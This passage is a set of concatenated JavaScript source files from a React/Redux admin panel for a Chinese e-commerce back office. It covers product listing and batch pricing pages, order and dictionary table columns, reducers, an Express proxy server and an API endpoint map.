  userList: {},
  userDetail: {},
  userAddress: {},
  userOrderList: {},
  userLoginLogs: {},
}
// Reducer for user-related data produced by the thunks in action/user.
// Each case replaces its slice key with the fetched payload.
export default function user(state = defaultState, action) {
  switch (action.type) {
    case GET_USER_LIST:
      return {
        ...state,
        userList: action.data
      }
    case GET_USER_BYID:
      return {
        ...state,
        userDetail: action.data
      }
    case GET_USER_ADDRESS_BYID:
      return {
        ...state,
        userAddress: action.data
      }
    case GET_USER_ORDER_BYID:
      return {
        ...state,
        userOrderList: action.data
      }
    case GET_USER_LOGIN_LOGS:
      return {
        ...state,
        userLoginLogs: action.data
      }
    default:
      return state
  }
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Link } from 'react-router-dom';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button, Divider, message, Modal, Popconfirm } from 'antd';
import PriceForm from './PriceForm';
import { getProductList, addBatch, batchUpProduct, batchDownProduct, updateProduct } from '../../action/product';
import { getSystemDicts } from '../../action/system';
import { getProductTypes } from '../../action/productType';
import { formatDateSecond, formatYuan, fixedNumber } from '../../utils/utils';
import { formItemLayout, showTotal, nullString, PRODUCT_STATUS, UNIT_VALUES } from '../../utils/constant';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ product }) => ({
productList: product.productList
}), {
getProductList,
})
@Form.create()
export default class ProductList extends React.PureComponent {
constructor(props) {
super(props);
this.columns = [
{
title: '产品名称',
dataIndex: 'name',
key: 'name',
align: 'center',
fixed: 'left',
},
{
title: '产品货号',
dataIndex: 'sameStyleNum',
key: 'sameStyleNum',
align: 'center',
},
{
title: '产品大类',
dataIndex: 'productCategory',
key: 'productCategory',
align: 'center',
render: (text) => {
const info = this.state.productCategory.find(item => item.label === text) || {};
return info.description || nullString;
}
},
{
title: '产品子类',
dataIndex: 'productSubcategory',
key: 'productSubcategory',
align: 'center',
render: (text) => {
const info = this.state.dictLevel4.find(item => item.label === text) || {};
return info.description || nullString;
}
},
{
title: '产品图片',
dataIndex: 'mainPicture',
key: 'mainPicture',
align: 'center',
render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
},
{
title: '价格(元)',
dataIndex: 'productPrice',
key: 'productPrice',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return product.price !== undefined ? formatYuan(product['price']) : nullString
}
},
{
title: '计价单位',
dataIndex: 'unit',
key: 'unit',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return UNIT_VALUES[product['unit']] || nullString
}
},
{
title: '颜色',
dataIndex: 'colour',
key: 'colour',
align: 'center',
},
{
title: '创建时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
width: '14%',
render: (text) => text ? formatDateSecond(text) : nullString
},
{
title: '状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: (text) => text ? PRODUCT_STATUS[text] : '待上架'
},
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
fixed: 'right',
render: (text, record) => {
return (
<div>
<Link to={`/product/detail/${record.id}`}>查看</Link>
<Divider type="vertical" />
<Link to={`/product/edit/${record.id}`}>编辑</Link>
<Divider type="vertical" />
{record.priceList.length ? (
<Popconfirm
placement="topLeft"
title={`请确定是否${record.status === '1' ? '下架' : '上架'}该产品?`}
onConfirm={() => this.updateProductStatus(record)}
okText="确定"
cancelText="取消"
>
<a href="javascript:;">{record.status === '1' ? '下架' : '上架'}</a>
</Popconfirm>
) : (
<Popconfirm
placement="topLeft"
title={`请确定是否定价该产品?`}
onConfirm={() => this.singlePrice(record)}
okText="确定"
cancelText="取消"
>
<a href="javascript:;">定价</a>
</Popconfirm>
)}
</div>
)
}
},
];
}
state = {
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
selectedRowKeys: [],
selectedRows: [],
loading: false,
visible: false,
confirmLoading: false,
batchList: [],
productCategory: [],
productSubcategory: [],
dictLevel4: [],
colour: [],
};
async componentDidMount() {
this.getProductList();
const productCategory = getProductTypes({ parentLabel: 'productCategory' });
this.setState({ productCategory: await productCategory });
const dictLevel4 = getProductTypes({ level: 4 });
this.setState({ dictLevel4: await dictLevel4 });
const colour = getSystemDicts({ parentLabel: 'colour' });
this.setState({ colour: await colour });
}
componentWillUnmount() {
this.setState = (state, callback) => { };
}
getProductList = async (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getProductList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
updateProductStatus = async ({ id, status, name }) => {
let nextStatus = '1';
let info = '上架';
if (status === '1') {
nextStatus = '2';
info = '下架';
}
const result = await updateProduct({
id,
status: nextStatus,
});
if (result && result.code === 0) {
message.success(`产品名称为${name}的产品${info}成功`);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
} else {
message.error('产品状态变更失败,请稍后重试');
}
}
singlePrice = (record) => {
this.setState({
batchList: [record],
});
this.showModal();
}
batchPrice = () => {
const { selectedRows } = this.state;
this.setState({
batchList: selectedRows,
});
this.showModal();
}
handleSubmit = (e) => {
e.preventDefault();
this.getProductList();
}
onSelectChange = (selectedRowKeys, selectedRows) => {
const { selectedRows: productList } = this.state;
let newRows = [];
if (selectedRowKeys.length === selectedRows.length) {
newRows = [...selectedRows];
} else if (selectedRowKeys.length > selectedRows.length) {
const otherRowsKeys = selectedRowKeys.filter(item => selectedRows.every(row => row.id !== item));
const otherRows = productList.filter(item => otherRowsKeys.indexOf(item.id) !== -1);
newRows = otherRows.concat(selectedRows);
}
this.setState({ selectedRows: newRows, selectedRowKeys });
}
handleReset = () => {
this.props.form.resetFields();
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getProductList({
limit: pagination.pageSize,
page: pagination.current,
});
}
showModal = () => {
this.setState({ visible: true });
}
handleOk = () => {
this.setState({ confirmLoading: true });
}
handleCancel = () => {
this.setState({ visible: false });
}
title = () => {
const { selectedRowKeys } = this.state;
return (
<div>
<span>操作处理:</span>
<Button disabled={!selectedRowKeys.length} onClick={this.batchPrice} type="primary">批量定价</Button>
<Divider type="vertical" />
<Button disabled={!selectedRowKeys.length} onClick={this.batchUpProduct} type="primary">批量上架</Button>
<Divider type="vertical" />
<Button disabled={!selectedRowKeys.length} onClick={this.batchDownProduct} type="primary">批量下架</Button>
</div>
)
}
addBatch = async(params) => {
const { batchList } = this.state;
let values = [];
batchList.forEach(item => {
values.push({
productId: item.id,
interval: `${params.num1}-${params.num2}`,
price: fixedNumber(params.price1 * 100),
unit: params.unit,
});
values.push({
productId: item.id,
interval: `${params.num3}-${params.num4}`,
price: fixedNumber(params.price2 * 100),
unit: params.unit,
});
values.push({
productId: item.id,
interval: `${params.num5}-${params.num6}`,
price: fixedNumber(params.price3 * 100),
unit: params.unit,
});
});
const result = await addBatch(values);
if (result && result.code === 0) {
this.handleCancel();
const nameStr = batchList.map(item => item.name).join('、');
const messageInfo = (
<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{nameStr}</span>定价成功</p>
);
message.success(messageInfo);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('批量定价失败,请稍后重试');
}
}
batchUpProduct = async() => {
const { selectedRows, selectedRowKeys } = this.state;
const noPriceNameList = [];
selectedRows.forEach(item => {
if (!item.priceList.length) {
noPriceNameList.push(item.name);
}
});
if (noPriceNameList.length) {
message.error(<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{noPriceNameList.join('、')}</span>还未定价,不能上架</p>)
return false;
}
const result = await batchUpProduct(selectedRowKeys);
if (result && result.code === 0) {
const nameStr = selectedRows.map(item => item.name).join('、');
const messageInfo = (
<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{nameStr}</span>上架成功</p>
);
message.success(messageInfo);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('批量上架失败,请稍后重试');
}
}
// Take every selected product off sale. Mirrors batchUpProduct: unpriced
// products are rejected before the request is made.
batchDownProduct = async () => {
  const { selectedRows, selectedRowKeys } = this.state;
  const noPriceNameList = selectedRows
    .filter(item => !item.priceList.length)
    .map(item => item.name);
  if (noPriceNameList.length) {
    message.error(<p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{noPriceNameList.join('、')}</span>还未定价,不能下架</p>)
    return false;
  }
  const result = await batchDownProduct(selectedRowKeys);
  if (result && result.code === 0) {
    const nameStr = selectedRows.map(item => item.name).join('、');
    message.success(
      <p style={{ display: 'inline' }}>产品名称为<span style={{ color: 'red' }}>{nameStr}</span>下架成功</p>
    );
    const pager = { ...this.state.pagination };
    this.getProductList({
      limit: pager.pageSize,
      page: pager.current,
    });
    this.setState({ selectedRowKeys: [] });
  } else {
    message.error('批量下架失败,请稍后重试');
  }
}
// When the top-level category changes, clear the dependent sub-category
// field, then reload its options for the newly chosen parent.
handleCateChange = async (value) => {
  this.props.form.setFieldsValue({ productSubcategory: undefined });
  if (!value) {
    return;
  }
  const result = await getProductTypes({ parentLabel: value });
  this.setState({ productSubcategory: result });
}
// Page layout: a search-form card, the product table (row selection feeds
// the batch pricing / on-sale / off-sale toolbar rendered by this.title),
// and a modal hosting the batch-pricing form.
render() {
  const { form: { getFieldDecorator }, productList = {} } = this.props;
  const { selectedRowKeys, loading, visible, confirmLoading, productCategory, productSubcategory } = this.state;
  // Checkbox selection is mirrored into state via onSelectChange.
  const rowSelection = { selectedRowKeys, onChange: this.onSelectChange };
  return (
    <div className="page-list product-list">
      <Card bordered={false} className="form-container">
        <Form onSubmit={this.handleSubmit}>
          <Row gutter={12}>
            <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
              <FormItem {...formItemLayout} label="产品名称">
                {getFieldDecorator('name')(
                  <Input placeholder="请输入产品名称" />
                )}
              </FormItem>
            </Col>
            <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
              <FormItem {...formItemLayout} label="产品货号">
                {getFieldDecorator('sameStyleNum')(
                  <Input placeholder="请输入产品货号" />
                )}
              </FormItem>
            </Col>
            {/* Category select reloads the sub-category options (handleCateChange). */}
            <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
              <FormItem {...formItemLayout} label="产品大类">
                {getFieldDecorator('productCategory')(
                  <Select onChange={this.handleCateChange} allowClear placeholder="请选择产品大类">
                    {productCategory.map(item => (
                      <Option key={item.label} value={item.label}>{item.description}</Option>
                    ))}
                  </Select>
                )}
              </FormItem>
            </Col>
            <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
              <FormItem {...formItemLayout} label="产品子类">
                {getFieldDecorator('productSubcategory')(
                  <Select allowClear placeholder="请选择产品子类">
                    {productSubcategory.map(item => (
                      <Option key={item.label} value={item.label}>{item.description}</Option>
                    ))}
                  </Select>
                )}
              </FormItem>
            </Col>
            <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
              <FormItem {...formItemLayout} label="产品状态">
                {getFieldDecorator('status')(
                  <Select allowClear placeholder="请选择产品状态">
                    {Object.keys(PRODUCT_STATUS).map(item => (
                      <Option key={item} value={item}>{PRODUCT_STATUS[item]}</Option>
                    ))}
                  </Select>
                )}
              </FormItem>
            </Col>
            <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
              <FormItem {...formItemLayout} label="是否定价">
                {getFieldDecorator('isHasPrice')(
                  <Select allowClear placeholder="请选择定价状态">
                    <Option value={0}>未定价</Option>
                    <Option value={1}>已定价</Option>
                  </Select>
                )}
              </FormItem>
            </Col>
            <Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
              <FormItem {...formItemLayout} label="创建起止时间">
                {getFieldDecorator('createTime')(
                  <RangePicker format={dateFormat} />
                )}
              </FormItem>
            </Col>
          </Row>
          <Row>
            <Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
              <Button type="primary" htmlType="submit">搜索</Button>
              <Button style={{ marginLeft: '8px', marginRight: '8px' }} onClick={this.handleReset}>清空</Button>
            </Col>
          </Row>
        </Form>
      </Card>
      <Card bordered={false}>
        <Table
          title={this.title}
          rowKey="id"
          scroll={{ x: 1200 }}
          onChange={this.handleTableChange}
          pagination={{ showTotal: showTotal, total: productList.total, ...this.state.pagination }}
          rowSelection={rowSelection}
          columns={this.columns}
          dataSource={productList.records}
          loading={loading}
        />
      </Card>
      {/* footer={null}: the PriceForm renders its own submit/cancel buttons. */}
      <Modal title="产品批量定价"
        visible={visible}
        onOk={this.handleOk}
        confirmLoading={confirmLoading}
        onCancel={this.handleCancel}
        footer={null}
      >
        <PriceForm handleCancel={this.handleCancel} addBatch={this.addBatch} />
      </Modal>
    </div>
  )
}
}
<file_sep>import API from '../utils/api';
import { get, post, put, deleted } from '../utils/request';
export const GET_SKYLIGHT_LIST = 'GET_SKYLIGHT_LIST';
export const GET_SKYLIGHT_BYID = 'GET_SKYLIGHT_BYID';
// Redux thunk: fetch a page of skylights and push it into the store when
// the HTTP request succeeds.
export function getSkylightList(params) {
  return async (dispatch) => {
    const result = await get(API.getSkylightList, params);
    const ok = result && result.status === 200;
    if (ok) {
      dispatch({ type: GET_SKYLIGHT_LIST, data: result.data });
    }
  }
}
// Redux thunk: fetch a single skylight by id; the payload lives one level
// deeper (result.data.data) than in the list endpoint.
export function getSkylightById(id) {
  return async (dispatch) => {
    const result = await get(`${API.getSkylightById}/${id}`);
    const ok = result && result.status === 200;
    if (ok) {
      dispatch({ type: GET_SKYLIGHT_BYID, data: result.data.data });
    }
  }
}
// POST a new skylight; resolves to the response body on HTTP 200 and to
// undefined otherwise.
export async function addSkylight(params) {
  const result = await post(API.addSkylight, params);
  return result && result.status === 200 ? result.data : undefined;
}
// PUT an updated skylight; resolves to the response body on HTTP 200 and
// to undefined otherwise.
export async function updateSkylight(params) {
  const result = await put(API.updateSkylight, params);
  return result && result.status === 200 ? result.data : undefined;
}
// DELETE a skylight by id; resolves to the response body on HTTP 200.
export async function deleteSkylight(id) {
  const result = await deleted(`${API.deleteSkylight}/${id}`);
  if (!result || result.status !== 200) {
    return undefined;
  }
  return result.data;
}
<file_sep>import { formatDateMinute } from '../../../utils/utils';
import { nullString } from '../../../utils/constant';
// antd Table column definitions for an order listing.
// NOTE(review): unlike the mapped order columns elsewhere in this repo,
// paymentMethod / paymentChannel / status are rendered as raw codes here —
// confirm whether this file is still in use or should map through constants.
const columns = [
  {
    // NOTE(review): titled "订单编号" (order number) but bound to
    // `expressTrackingNo` (express tracking number) — confirm the field.
    title: '订单编号',
    dataIndex: 'expressTrackingNo',
    key: 'expressTrackingNo',
    align: 'center',
  },
  {
    title: '提交时间',
    dataIndex: 'createdTime',
    key: 'createdTime',
    align: 'center',
    // Falls back to the shared null placeholder when the timestamp is absent.
    render: (text) => text ? formatDateMinute(text) : nullString
  },
  {
    title: '用户账号',
    dataIndex: 'accountId',
    key: 'accountId',
    align: 'center',
  },
  {
    title: '订单金额(元)',
    dataIndex: 'orderAmountPayment',
    key: 'orderAmountPayment',
    align: 'center',
  },
  {
    title: '代理商',
    dataIndex: 'agentId',
    key: 'agentId',
    align: 'center',
  },
  {
    title: '返点金额(元)',
    dataIndex: 'rebateTotal',
    key: 'rebateTotal',
    align: 'center',
  },
  {
    title: '支付方式',
    dataIndex: 'paymentMethod',
    key: 'paymentMethod',
    align: 'center',
  },
  {
    title: '订单来源',
    dataIndex: 'paymentChannel',
    key: 'paymentChannel',
    align: 'center',
  },
  {
    title: '订单状态',
    dataIndex: 'status',
    key: 'status',
    align: 'center',
  },
];
export default columns;
<file_sep>import { ORDER_STATUS } from '../../../utils/constant';
import { formatDateSecond } from '../../../utils/utils';
// Index-based label map — assumes paymentStatus is 0 (成功) or 1 (失败);
// any other value renders as undefined. TODO confirm against the backend enum.
const paymentStatus = ['支付成功', '支付失败'];
// antd Table column definitions for an order's shipping/status summary.
const columns = [
  {
    title: '快递公司',
    dataIndex: 'expressCompanyName',
    key: 'expressCompanyName',
    align: 'center',
  },
  {
    title: '操作时间',
    dataIndex: 'shippingTime',
    key: 'shippingTime',
    align: 'center',
    render: text => text && formatDateSecond(text)
  },
  {
    title: '订单状态',
    dataIndex: 'status',
    key: 'status',
    align: 'center',
    // Unknown status codes are shown as 未支付.
    render: text => ORDER_STATUS[text] || '未支付'
  },
  {
    title: '支付状态',
    dataIndex: 'paymentStatus',
    key: 'paymentStatus',
    align: 'center',
    render: text => paymentStatus[text],
  },
  {
    // Shipped iff a tracking number exists.
    title: '发货状态',
    dataIndex: 'expressTrackingNo',
    key: 'expressTrackingNo',
    align: 'center',
    render: text => text ? '已发货' : '未发货',
  },
  {
    // NOTE(review): titled "备注" (remark) but bound to `quantity` — confirm.
    title: '备注',
    dataIndex: 'quantity',
    key: 'quantity',
    align: 'center',
  }
];
export default columns;
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Form, Row, Col, Input, Select, DatePicker, Table, Button } from 'antd';
import { getSystemLogList } from '../../action/system';
import listColumns from './columns/list';
import { formItemLayout, showTotal } from '../../utils/constant';
const FormItem = Form.Item;
const { Option } = Select;
const { RangePicker } = DatePicker;
const dateFormat = 'YYYY/MM/DD';
@connect(({ system }) => ({
systemLogList: system.systemLogList
}), {
getSystemLogList,
})
@Form.create()
export default class OperateLog extends React.PureComponent {
constructor(props) {
super(props);
this.columns = [
...listColumns,
];
}
state = {
selectedRowKeys: [],
loading: false,
};
componentDidMount() {
this.props.getSystemLogList();
}
getSystemLogList = (params) => {
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
const { createTime, ...newParams } = values;
const beginTime = values.createTime ? values.createTime[0].format('YYYY-MM-DD') : undefined;
const endTime = values.createTime ? values.createTime[1].format('YYYY-MM-DD') : undefined;
await this.props.getSystemLogList({ ...newParams, ...params, beginTime, endTime});
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
handleSubmit = (e) => {
e.preventDefault();
this.getSystemLogList();
}
onSelectChange = (selectedRowKeys) => {
this.setState({ selectedRowKeys });
}
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getSystemLogList({
limit: pagination.pageSize,
page: pagination.current,
});
}
render() {
const { form: { getFieldDecorator }, systemLogList = {} } = this.props;
const { selectedRowKeys, loading } = this.state;
const rowSelection = { selectedRowKeys, ...this.rowSelection };
return (
<div className="page-list operateLog-list">
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="操作人">
{getFieldDecorator('createBy')(
<Input placeholder="请输入操作人" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="日志类型">
{getFieldDecorator('type')(
<Select allowClear placeholder="请选择日志类型">
<Option value="1">类别1</Option>
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 8 }}>
<FormItem {...formItemLayout} label="创建起止时间">
{getFieldDecorator('createTime')(
<RangePicker format={dateFormat} />
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button
style={{ marginLeft: '8px', marginRight: '8px' }}
onClick={this.handleReset}
>
清空
</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
rowKey="id"
rowSelection={rowSelection}
columns={this.columns}
dataSource={systemLogList.records}
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: systemLogList.total, ...this.state.pagination }}
loading={loading}
/>
</Card>
</div>
)
}
}
<file_sep>import React from 'react';
import { formatDateSecond } from '../../../utils/utils';
// antd Table column definitions for the system dictionary listing.
const columns = [
  {
    title: '字典编码',
    dataIndex: 'label',
    key: 'label',
    align: 'center',
  },
  {
    title: '字典值',
    dataIndex: 'value',
    key: 'value',
    align: 'center',
  },
  {
    title: '字典名称',
    dataIndex: 'description',
    key: 'description',
    align: 'center',
  },
  {
    title: '层级',
    dataIndex: 'level',
    key: 'level',
    align: 'center',
  },
  {
    title: '上级编码',
    dataIndex: 'parentLabel',
    key: 'parentLabel',
    align: 'center',
  },
  {
    title: '顺序',
    dataIndex: 'sort',
    key: 'sort',
    align: 'center',
  },
  {
    title: '图片',
    dataIndex: 'image',
    key: 'image',
    align: 'center',
    // NOTE(review): renders an <img> even when `image` is empty — consider
    // a placeholder; confirm whether empty values occur.
    render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
  },
  {
    title: '创建时间',
    dataIndex: 'createTime',
    key: 'createTime',
    align: 'center',
    render: (text) => formatDateSecond(text)
  },
  {
    title: '创建人',
    dataIndex: 'creator',
    key: 'creator',
    align: 'center',
  },
];
export default columns;
<file_sep>const columns = [
{
title: '货号',
dataIndex: 'productCategory',
key: 'productCategory',
align: 'center',
},
{
title: '图片',
dataIndex: 'age',
key: 'productSubcategory',
align: 'center',
},
{
title: '颜色',
dataIndex: 'mainPicture',
key: 'mainPicture',
align: 'center',
},
{
title: '成分',
dataIndex: 'name',
key: 'name',
align: 'center',
},
{
title: '克重',
dataIndex: 'productPrice',
key: 'productPrice',
align: 'center',
},
{
title: '门幅',
dataIndex: 'unit',
key: 'unit',
align: 'center',
},
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
},
];
export default columns;
<file_sep>import 'braft-editor/dist/index.css';
import React from 'react';
import { Link } from 'react-router-dom';
import { Card, Form, Input, Select, Button, message } from 'antd';
import BraftEditor from 'braft-editor'
import EnhanceTitle from '../../component/EnhanceTitle';
import Uploader from '../../component/Uploader';
import { upgradeUser } from '../../action/user';
import { formItemLayout2, formItemLayout4, AGENT_TYPE } from '../../utils/constant';
const FormItem = Form.Item;
const Option = Select.Option;
@Form.create()
export default class UserUpgrade extends React.PureComponent {
componentWillUnmount() {
this.timer = null;
}
timer = null;
handleSubmit= (e) => {
e.preventDefault();
this.props.form.validateFields(async (err, values) => {
if (!err) {
const { id } = this.props.match.params;
const { detail, mainPicture, ...params } = values;
const newDetail = values.detail.toRAW();
const url = mainPicture && mainPicture[0];
const result = await upgradeUser({ ...params, accountId: id, url });
if (result && result.code === 0) {
message.success('升级代理商成功!将会返回用户列表页面');
this.timer = setTimeout(() => {
this.props.history.push('/user/list');
});
} else {
message.error('升级代理商失败!请稍后重试');
}
}
});
}
handleReset = () => {
this.props.form.resetFields();
this.props.form.setFieldsValue({ detail: BraftEditor.createEditorState(null) });
}
render() {
const { getFieldDecorator } = this.props.form;
const controls = ['bold', 'italic', 'underline', 'text-color', 'separator', 'link', 'separator', 'media' ]
return (
<div className="page-detail">
<Form onSubmit={this.handleSubmit}>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<FormItem {...formItemLayout2} label="代理商类型">
{getFieldDecorator('type', {
rules: [{
required: true, message: '请选择代理商类型',
}],
})(
<Select allowClear placeholder="请选择代理商类型">
{Object.keys(AGENT_TYPE).map(item => (
<Option key={item} value={item}>{AGENT_TYPE[item]}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="代理商编号">
{getFieldDecorator('TODO1')(
<Input placeholder="请输入代理商编号" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="代理商名称">
{getFieldDecorator('name', {
rules: [{
required: true, message: '请输入代理商名称',
}],
})(
<Input placeholder="请输入代理商名称" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="代理商账号">
{getFieldDecorator('phoneNumber', {
rules: [{
required: true, message: '请输入代理商账号',
}],
})(
<Input placeholder="请输入代理商账号" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="返点率">
{getFieldDecorator('diPer', {
rules: [{
required: true, message: '请输入返点率',
}],
})(
<Input addonAfter="%" placeholder="请输入返点率" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="门店图片">
{getFieldDecorator('mainPicture', {
rules: [{
required: true, message: '请添加门店图片',
}],
})(
<Uploader max={1}/>
)}
</FormItem>
<FormItem {...formItemLayout4} label="门店详情">
{getFieldDecorator('detail')(
<BraftEditor
className="my-editor"
controls={controls}
placeholder="请输入正文内容"
/>
)}
</FormItem>
</Card>
<div>
<Button style={{ width: '100px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
<Button onClick={this.handleReset} style={{ width: '100px', marginRight: '20px' }}>清空</Button>
<Button style={{ width: '100px' }}><Link to="/user/list">返回</Link></Button>
</div>
</Form>
</div>
)
}
}
<file_sep>import path from 'path';
import express from 'express';
import history from 'connect-history-api-fallback';
import httpProxy from 'http-proxy';
import compression from 'compression';
import helmet from 'helmet';
// Static-asset server for the built SPA plus a reverse proxy for /api.
const app = express(); // express is a factory function, not a constructor
const port = 8000;

app.use(history());
app.use(compression()); // gzip/deflate compress responses
app.use(helmet()); // common security headers
app.use('/', express.static(path.join(__dirname, '..', 'build')));

const targetUrl = 'http://172.16.17.32:9997';
const proxy = httpProxy.createProxyServer({
  target: targetUrl,
  prependPath: false
})

// Fix: without an 'error' listener, a failed upstream request raises an
// unhandled 'error' event on the proxy and crashes the whole process.
proxy.on('error', (err, req, res) => {
  console.log(err);
  if (res && !res.headersSent) {
    res.writeHead(502, { 'Content-Type': 'text/plain' });
  }
  if (res) {
    res.end('Bad gateway');
  }
});

app.use('/api', (req, res) => {
  proxy.web(req, res);
});

app.listen(port, (err) => {
  if (err) {
    console.log(err);
  } else {
    // Fix: the port was hard-coded as 8000 in the message; interpolate the
    // actual `port` so the log cannot drift out of sync.
    console.log(`===>open listen port ${port}`);
  }
});
<file_sep>import { GET_PRODUCT_TYPE_LIST } from '../action/productType';
// Initial shape of the product-type slice.
const defaultState = {
  productTypeList: {},
}

// Reducer for product-type data; only GET_PRODUCT_TYPE_LIST is handled,
// every other action returns the state unchanged.
export default (state = defaultState, action) => {
  if (action.type === GET_PRODUCT_TYPE_LIST) {
    return { ...state, productTypeList: action.data };
  }
  return state;
}
<file_sep>import { GET_PRODUCT_LIST, GET_PRODUCT_BYID } from '../action/product';
// Initial shape of the product slice: the paged listing and one detail record.
const defaultState = {
  productList: {},
  productDetail: {},
}

// Reducer for product data; unhandled actions return the state unchanged.
export default (state = defaultState, action) => {
  if (action.type === GET_PRODUCT_LIST) {
    return { ...state, productList: action.data };
  }
  if (action.type === GET_PRODUCT_BYID) {
    return { ...state, productDetail: action.data };
  }
  return state;
}
<file_sep>const API = {
authLogin: '/api/auth/oauth/token',
productList: '/api/goods/tProduct/page',
updateProduct: '/api/goods/tProduct/update', //put
addProduct: '/api/goods/tProduct', //post
getProductById: '/api/goods/tProduct',
batchUpProduct: '/api/goods/tProduct/batchUpProduct', // post
batchDownProduct: '/api/goods/tProduct/batchDownProduct', //post
addBatch: '/api/goods/tProductPrice/addBatch',
getProductCode: '/api/goods/tProduct/{id}/{sn}/getQRCode',
orderList: '/api/goods/order/page',
updateOrder: '/api/goods/order/update', //put
getOrderById: '/api/goods/order',
deleteOrderById: '/api/goods/order', //delete
userList: '/api/goods/tUserAccount/page',
upgradeUser: '/api/goods/tAgent/add', // post
updateUser: '/api/goods/tUserAccount/update',
getUserById: '/api/goods/tUserAccount',
getUserAddressById: '/api/goods/tUserAccountReceiveAddress',
getUserOrderById: '/api/goods/order/page',
getUserLoginList: '/api/admin/log/loginLogPage',
agentList: '/api/goods/tAgent/page',
getAgentById: '/api/goods/tAgent',
addAgent: '/api/goods/tAgent/add', // post
updateAgent: '/api/goods/tAgent/update',
agentProduct: '/api/goods/tAgentProduct/addBatch',
agentProductList: '/api/goods/tAgentProduct/page',
deleteAgentById: '/api/goods/tAgent',
getSkylightList: '/api/goods/tSkyLight/page',
getSkylightById: '/api/goods/tSkyLight',
addSkylight: '/api/goods/tSkyLight/add',
updateSkylight: '/api/goods/tSkyLight/update',
deleteSkylight: '/api/goods/tSkyLight',
getSystemLogList: '/api/admin/log/logPage',
getSystemDictList: '/api/admin/dict/dictPage',
getSystemDictByType: '/api/admin/dict/dictPage',
postSystemDict: '/api/admin/dict',
putSystemDict: '/api/admin/dict',
getSystemDictById: '/api/admin/dict/{id}',
getSystemDictByLabel: '/api/admin/dict/{label}',
getSystemDicts: '/api/admin/dict/dictList',
getUserInfo: '/api/admin/user/info',
getProductTypeList: '/api/goods/tProductType/page',
postProductType: '/api/goods/tProductType/add',
putProductType: '/api/goods/tProductType/update',
getProductTypeById: '/api/goods/tProductType/{id}',
getProductTypes: '/api/goods/tProductType/dictList',
delectAgentProduct: '/api/goods/tAgentProduct/deleteBatch/{agentId}',
resetAdminInfo: '/api/admin/user/editInfo',
}
export default API;
<file_sep>import API from '../utils/api';
import { get, post, put, deleted } from '../utils/request';
import { authUserExpire } from './auth';
export const GET_AGENT_LIST = 'GET_AGENT_LIST';
